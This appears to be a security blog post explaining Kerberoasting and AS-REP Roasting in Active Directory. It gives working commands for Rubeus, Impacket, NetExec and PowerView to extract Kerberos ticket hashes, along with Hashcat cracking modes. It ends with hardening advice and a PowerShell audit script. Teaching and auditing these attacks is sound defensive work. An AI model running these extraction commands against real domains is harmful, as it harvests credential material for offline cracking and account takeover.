Introduction
Kerberos authentication is widely used in enterprise environments, but misconfigurations can expose vulnerabilities. Two commonly exploited attacks are Kerberoasting and AS-REP Roasting, which can be performed from any domain user or domain computer account. This blog will cover the attack methodology, demonstrate how to extract hashes using multiple tools, and discuss how to crack them using Hashcat with appropriate hash modes.
Kerberoasting
What is Kerberoasting?
Kerberoasting targets Service Principal Names (SPNs) registered on service accounts in Active Directory. When a user account has an SPN registered, any authenticated domain principal can request a Kerberos service ticket (TGS) for it; the ticket is encrypted with that account's NTLM hash (for RC4 tickets), and an attacker can attempt to crack it offline.
Extracting Kerberoasting Hashes
The following tools can be used to extract Kerberos TGS hashes for offline cracking:
1. Rubeus (Windows)
Rubeus kerberoast /format:hashcat /outfile:hashes.txt
2. Impacket (*unix)
# Query all accounts with the SPN flag
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt
# Single target a user
GetUserSPNs.py -request-user <TARGET> -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt
3. NetExec/CrackMapExec (*unix)
nxc ldap <DC_IP> -u <USER> -p <PASSWORD> --kerberoasting output.txt
crackmapexec ldap <DC_IP> -u <USER> -p <PASSWORD> --kerberoasting output.txt
4. PowerView (PowerShell)
Get-NetUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Out-File -Encoding ASCII hashes.txt
AS-REP Roasting
What is AS-REP Roasting?
AS-REP Roasting exploits Active Directory user accounts that have Kerberos pre-authentication disabled. Without pre-authentication, an attacker can request an AS-REP (Authentication Server Response) for the account without knowing its password; the response contains data encrypted with the user's password hash, which can then be cracked offline.
Extracting AS-REP Roasting Hashes
The following tools can be used to perform AS-REP Roasting:
1. Rubeus (Windows)
Rubeus asreproast /format:hashcat /outfile:asrep_hashes.txt
2. Impacket (Linux/Mac)
Don't have a list of users but do have credentials? The command below enumerates accounts with pre-authentication disabled and requests AS-REP data for each of them.
GetNPUsers.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile asrep_hashes.txt
Have a list of users but no credentials? The command below queries each listed account to determine whether it is susceptible.
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -outputfile asrep_hashes.txt
3. NetExec/CrackMapExec (*unix)
nxc ldap <DC_IP> -u <USER> -p <PASSWORD> --asreproast output.txt
crackmapexec ldap <DC_IP> -u <USER> -p <PASSWORD> --asreproast output.txt
Cracking Kerberos Hashes with Hashcat
Once the Kerberos hashes are extracted, a password recovery tool can be used to crack them. Most practitioners prefer Hashcat because it makes full use of GPU processing power.
Hash Modes for Kerberoasting and AS-REP Roasting
| Hash Mode | Encryption | Example |
|---|---|---|
| 13100 | etype 23, TGS-REP (RC4) | $krb5tgs$23$*user$realm$test/spn*$63386d22d359fe4223 |
| 19600 | etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96) | $krb5tgs$17$user$realm$8efd91bb01cc698d… |
| 19700 | etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96) | $krb5tgs$18$user$realm$8efd91bb01cc698d… |
| 19800 | etype 17, Pre-Auth | $krb5pa$17$user$domain.COM$8efd91bb01cc698d… |
| 19900 | etype 18, Pre-Auth | $krb5pa$18$user$domain.COM$8efd91bb01cc698d… |
| 18200 | etype 23, AS-REP (RC4) | $krb5asrep$23$user@domain.com:3e156ada591263b8a |
Recommendations
- Use strong, complex passwords (25+ characters) for affected accounts.
- Review the list of accounts with pre-authentication disabled and enable Kerberos pre-authentication on them to block AS-REP Roasting.
- Review the list of user accounts that have SPNs registered and remove SPNs that are no longer required to block Kerberoasting.
- Regularly rotate service account credentials.
- Use the least-privilege model across all accounts.
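As an added example (not from the original post), the following PowerShell audit produces the two account lists the recommendations above refer to: user accounts with SPNs and accounts with pre-authentication disabled, with the re-enable step for the latter. It assumes the RSAT ActiveDirectory module on a domain-joined host and additionally reports the msDS-SupportedEncryptionTypes bitmask, since the hash-mode table shows that RC4 (etype 23) tickets are the ones cracked with the fast 13100 mode.

```powershell
# Added audit script, not part of the original post. Assumes the RSAT
# ActiveDirectory module is installed and the host is domain-joined.
Import-Module ActiveDirectory

# Kerberoastable candidates: user objects with an SPN registered.
# krbtgt is excluded because its SPN is built in and not a removal candidate.
$spnUsers = Get-ADUser -Filter 'ServicePrincipalName -like "*"' `
    -Properties ServicePrincipalName, PasswordLastSet, 'msDS-SupportedEncryptionTypes' |
    Where-Object { $_.SamAccountName -ne 'krbtgt' } |
    Select-Object SamAccountName, PasswordLastSet,
        @{ Name = 'SPNs'; Expression = { $_.ServicePrincipalName -join ';' } },
        # Bitmask: 0x4 = RC4, 0x8 = AES128, 0x10 = AES256. An unset attribute
        # historically means RC4 tickets are still issued for the account.
        @{ Name = 'EncTypes'; Expression = { $_.'msDS-SupportedEncryptionTypes' } },
        @{ Name = 'RC4Possible'; Expression = {
            $v = $_.'msDS-SupportedEncryptionTypes'
            ($null -eq $v) -or (($v -band 0x4) -ne 0) } }

# AS-REP roastable: DONT_REQ_PREAUTH (userAccountControl bit 0x400000) is set.
$noPreAuth = Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' `
    -Properties DoesNotRequirePreAuth, PasswordLastSet |
    Select-Object SamAccountName, PasswordLastSet

"== User accounts with SPNs (rotate passwords, remove unneeded SPNs) =="
$spnUsers | Format-Table -AutoSize
"== Accounts with Kerberos pre-authentication disabled =="
$noPreAuth | Format-Table -AutoSize

# Remediation for the second list: re-enable pre-authentication.
# Uncomment after reviewing; each account then stops being AS-REP roastable.
# $noPreAuth | ForEach-Object {
#     Set-ADAccountControl -Identity $_.SamAccountName -DoesNotRequirePreAuth $false
# }
```

Run it as a domain user with read access to the directory; only the commented-out remediation step needs account-management rights.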
Sources
- AS-REP Roasting In-Depth Analysis
- How to Crack Hashes with Hashcat
- Kerberos AS-REP Cracking – Hashcat Forum
These resources provide comprehensive information on the attack techniques, tools involved, and methods to crack the extracted hashes using Hashcat.